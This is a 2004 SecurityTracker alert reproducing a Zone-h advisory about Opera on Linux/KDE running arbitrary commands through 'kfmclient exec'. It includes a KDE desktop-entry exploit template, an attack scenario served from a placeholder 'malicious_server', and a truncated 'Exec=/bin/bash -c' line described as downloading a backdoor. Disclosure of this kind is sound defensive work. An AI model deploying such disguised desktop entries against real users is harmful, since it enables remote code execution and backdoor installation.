Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
Opera Default 'kfmclient exec' Configuration May Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012491
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 13 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): Tested on Opera 7.54 on Linux with KDE 3.2.3
Description:   A vulnerability was reported in Opera when using KDE. A remote user may be able to cause the target user to execute arbitrary commands.

Giovanni Delvecchio of Zone-h reported that KDE uses 'kfmclient exec' as the default application for processing saved files. A remote user can cause arbitrary shell commands to be executed on the target system.

For example, a remote server can supply 'image.Jpg' with an unknown Content-Type field, causing Opera to display a dialog box for the file. If the target user selects 'Open' to view the supposed image file, the file will be opened using 'kfmclient exec'. If 'image.Jpg' is a KDE desktop entry, then the target user's system will execute the command in the 'Exec' entry.

The original advisory is available at:

Impact:   A remote user may be able to cause arbitrary commands to be executed on the target user's system with some user interaction.
Solution:   No vendor solution was available at the time of this entry.

The report indicates that as a workaround, you can disable 'kfmclient exec' as the default application.

Vendor URL: (Links to External Site)
Cause:   Configuration error, Input validation error, State error
Underlying OS:  Linux (Any)

Message History:   None.

 Source Message Contents

Subject:  [ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclien

Author: Giovanni Delvecchio

Original Advisory:

Tested version:
Opera 7.54 linux version with Kde 3.2.3

Opera for linux uses "kfmclient exec" as "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop 
Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:


# KDE Config File
[KDE Desktop Entry]
Exec="Any arbitrary command"

Possible method of Exploitation

This method of exploitation needs that a particular file name extension
is used.
If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , 
the command in "Exec=" entry will be executed.
Instead, If "page.htm" is used as file name, it will not be opened like a 
"kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since
the "system" is case sensitive.

Attack scenario:

1- A user clicks on a link which requires http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field , for
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will 
show a dialog window.

3- if a user chooses "Open" to view image.Jpg, it will be opened by
"kfmclient exec" command, since kfmclient is the "Default Application"

4- Image.Jpg is a kde desktop entry :


# KDE Config File
[KDE Desktop Entry]
Exec=/bin/bash -c 

---- end of image.Jpg-------

Note: \t is an horizontal tab.
In this case a backdoor will be downloaded on victim's computer and 

Disable "kfmclient exec" as default application

Filtri antispamming e antivirus per la tua casella di posta


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC